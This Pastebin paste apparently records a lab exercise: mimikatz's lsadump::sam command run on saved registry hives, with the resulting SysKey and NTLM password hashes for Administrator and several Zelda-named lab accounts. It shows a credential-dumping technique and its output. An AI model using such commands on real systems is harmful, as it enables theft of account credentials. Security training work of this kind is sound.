Advertisement
Guest User

lab9behemothcsrl

a guest
Dec 11th, 2018
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. Using 'hash.txt' for logfile : OK
  2.  
  3. mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
  4. Domain : WIN-2KOLDIQN4QR
  5. SysKey : 758d47bee970523e1e4da9e29ccc11cf
  6. Local SID : S-1-5-21-3493773132-1197071367-3417895246
  7.  
  8. SAMKey : ac3c5d89af8125a470d485122e1a134b
  9.  
  10. RID : 000001f4 (500)
  11. User : Administrator
  12. Hash NTLM: b178b34d1659939a5e6057ca5f154df9
  13.  
  14. RID : 000001f5 (501)
  15. User : Guest
  16.  
  17. RID : 000003eb (1003)
  18. User : zelda
  19. Hash NTLM: c6f985e00435d8de6a3c81dcbb866a15
  20.  
  21. RID : 000003ec (1004)
  22. User : ganon
  23. Hash NTLM: a36398ff9909009bec689c0b2011f471
  24.  
  25. RID : 000003ed (1005)
  26. User : Link
  27. Hash NTLM: e29d9ecadc385f47a7d2786d6fa2bdf3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement